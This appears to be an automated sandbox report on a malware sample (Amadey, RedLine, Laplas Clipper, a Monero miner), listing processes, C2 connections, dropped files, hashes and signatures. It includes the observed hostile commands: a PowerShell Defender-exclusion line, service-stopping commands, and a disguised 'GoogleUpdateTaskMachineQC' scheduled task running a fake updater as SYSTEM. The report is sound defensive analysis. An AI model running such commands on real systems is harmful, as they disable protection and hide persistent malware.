C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 second.amadgood.com udp
NL 45.15.156.208:80 45.15.156.208 tcp
NL 45.15.156.208:80 45.15.156.208 tcp
NL 194.180.49.153:80 194.180.49.153 tcp
US 206.189.229.43:80 206.189.229.43 tcp
SG 128.199.192.86:81 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 xmr.2miners.com udp
DE 162.19.139.184:12222 xmr.2miners.com tcp
US 8.8.8.8:53 second.amadgood.com udp
NL 45.15.156.208:80 45.15.156.208 tcp

Files

memory/2332-55-0x0000000000A30000-0x00000000014D1000-memory.dmp

memory/2332-54-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2332-57-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2332-59-0x0000000000A30000-0x00000000014D1000-memory.dmp

memory/2332-61-0x0000000000110000-0x0000000000111000-memory.dmp

memory/2332-62-0x0000000077A40000-0x0000000077A41000-memory.dmp

memory/2332-66-0x0000000000200000-0x0000000000201000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2332-75-0x0000000000A30000-0x00000000014D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2764-79-0x0000000000890000-0x0000000001331000-memory.dmp

memory/2764-80-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2764-84-0x0000000000140000-0x0000000000141000-memory.dmp

memory/2764-82-0x0000000000890000-0x0000000001331000-memory.dmp

memory/2764-85-0x0000000077A40000-0x0000000077A41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\770849782088

MD5 066ebb934cbf5d30cd575eaf8219fd21
SHA1 0126b25a5d9dcf90655e5be386bbaa0790317d80
SHA256 f4bb9d430f84e5c95313316149b8061cfd8a94086cd7a606277beb9bf02a81b2
SHA512 a2ba7e35788a8332a254909e0068360fdfe8315180d1429f6da85c653e814c19f4b1509ceb3cceef087310f787a185439231f5b9f682dccc3a3a9b97c66b8a49

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 e899a1808b9ca1b53992dd68df084265
SHA1 2d7982b52e43461943748c280e166f707627e4f6
SHA256 d3e44f4d004dd23433f3dbeb1532b853b645b6e213b0c5f5eee9a786bf0b762c
SHA512 1d5796d8a3b911620393b2cce990cca5a94b0f440fbee1a8e43df54cbdb3dcf4cc7f8bbdc26246f1ecd6c77ace007fbad830fbbaf63a9c697254d5f85ce2acf1

memory/2764-116-0x0000000000890000-0x0000000001331000-memory.dmp

memory/1648-117-0x0000000001040000-0x0000000001286000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2568-132-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/1648-131-0x0000000074140000-0x000000007482E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/2568-142-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-144-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-146-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-145-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-147-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2764-150-0x0000000000890000-0x0000000001331000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/2764-151-0x0000000004550000-0x000000000539A000-memory.dmp

memory/2568-149-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/2568-148-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/2764-155-0x0000000004670000-0x0000000004FB3000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/860-158-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-164-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-163-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-162-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-161-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-160-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-159-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/2568-157-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/860-156-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-167-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-169-0x00000000008B0000-0x00000000011F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/860-168-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-166-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-165-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/1092-176-0x00000000023C0000-0x00000000023C8000-memory.dmp

memory/1092-177-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/1092-179-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1092-178-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1092-180-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/1648-181-0x0000000074140000-0x000000007482E000-memory.dmp

memory/1092-182-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/2568-183-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/1092-175-0x000000001B020000-0x000000001B302000-memory.dmp

memory/1092-185-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/2568-184-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/1092-186-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

memory/2764-188-0x0000000004550000-0x000000000539A000-memory.dmp

memory/860-189-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-190-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/860-191-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/860-193-0x00000000008B0000-0x00000000011F3000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H7W8DGSO7GUP79CBECNI.temp

MD5 f0492bc602768244b35fd12d2bb06629
SHA1 b3965c328a99a726e2d0d1a15d18ebd0fad6bd7a
SHA256 a8ea72ac05cd4fd0c5de31232b77f908bfc6daefe1b6d7518c0053d944b21ed0
SHA512 3759100e54f64ba3b71364c4a63c7681f06a15b5e00a6a4a78e3958e4d8a33804014a45b7f9153d7ba466e7a79d9347135539217c90ea16ede060b0e4ee2c479

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f0492bc602768244b35fd12d2bb06629
SHA1 b3965c328a99a726e2d0d1a15d18ebd0fad6bd7a
SHA256 a8ea72ac05cd4fd0c5de31232b77f908bfc6daefe1b6d7518c0053d944b21ed0
SHA512 3759100e54f64ba3b71364c4a63c7681f06a15b5e00a6a4a78e3958e4d8a33804014a45b7f9153d7ba466e7a79d9347135539217c90ea16ede060b0e4ee2c479

memory/1648-194-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

memory/1648-200-0x0000000000380000-0x000000000039C000-memory.dmp

memory/1896-204-0x0000000002320000-0x0000000002328000-memory.dmp

memory/1896-201-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/1896-202-0x000000001B240000-0x000000001B522000-memory.dmp

memory/2568-205-0x000000013F110000-0x000000013FF5A000-memory.dmp

memory/1896-207-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1896-208-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1896-203-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1896-206-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

memory/1648-209-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1896-210-0x0000000002720000-0x00000000027A0000-memory.dmp

memory/1648-211-0x0000000000380000-0x0000000000395000-memory.dmp

memory/860-212-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/1648-214-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-216-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-218-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-220-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-222-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-224-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-226-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-228-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-230-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-232-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-234-0x0000000000380000-0x0000000000395000-memory.dmp

memory/1648-235-0x00000000004E0000-0x00000000004E1000-memory.dmp

memory/1896-236-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2568-240-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/2568-239-0x000000013F110000-0x000000013FF5A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1976-242-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1648-245-0x0000000000FA0000-0x0000000000FE0000-memory.dmp

memory/1976-258-0x0000000074140000-0x000000007482E000-memory.dmp

memory/1976-259-0x0000000000400000-0x000000000045A000-memory.dmp

memory/1648-260-0x0000000074140000-0x000000007482E000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2216-262-0x000000013F270000-0x00000001400BA000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/3036-266-0x000000013F270000-0x00000001400BA000-memory.dmp

memory/2408-275-0x0000000000890000-0x0000000001331000-memory.dmp

memory/2408-280-0x0000000000890000-0x0000000001331000-memory.dmp

memory/3036-283-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/1976-285-0x00000000071E0000-0x0000000007220000-memory.dmp

\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 17e9a9e536912fb90bf04747356c88bc
SHA1 e7381cf2ce16647f6fa62baf1bd1a1bc7233d1ee
SHA256 bff996229d6934d73b9264a2493fa471f2ceba9e6ec1c5b00cd27576122f3341
SHA512 91a9cdda2541c93bb75a577b24406eac6660b8e87ed2a8c190dad34a36c75957d3adfbf24c29ff619ef772e588e75c6b808798b4bc0f3c0041b9f99aa475bf05

memory/860-288-0x00000000289B0000-0x00000000292F3000-memory.dmp

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 17e9a9e536912fb90bf04747356c88bc
SHA1 e7381cf2ce16647f6fa62baf1bd1a1bc7233d1ee
SHA256 bff996229d6934d73b9264a2493fa471f2ceba9e6ec1c5b00cd27576122f3341
SHA512 91a9cdda2541c93bb75a577b24406eac6660b8e87ed2a8c190dad34a36c75957d3adfbf24c29ff619ef772e588e75c6b808798b4bc0f3c0041b9f99aa475bf05

memory/860-293-0x0000000077840000-0x00000000779E9000-memory.dmp

memory/860-292-0x00000000008B0000-0x00000000011F3000-memory.dmp

memory/2848-291-0x0000000000940000-0x0000000001283000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-29 04:50

Reported

2023-07-29 04:55

Platform

win10-20230703-en

Max time kernel

300s

Max time network

303s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Program Files\Google\Chrome\updater.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Program Files\Google\Chrome\updater.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1148472871-1113856141-1322182616-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3444 set thread context of 4132 N/A C:\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 1384 set thread context of 2328 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 1384 set thread context of 4992 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
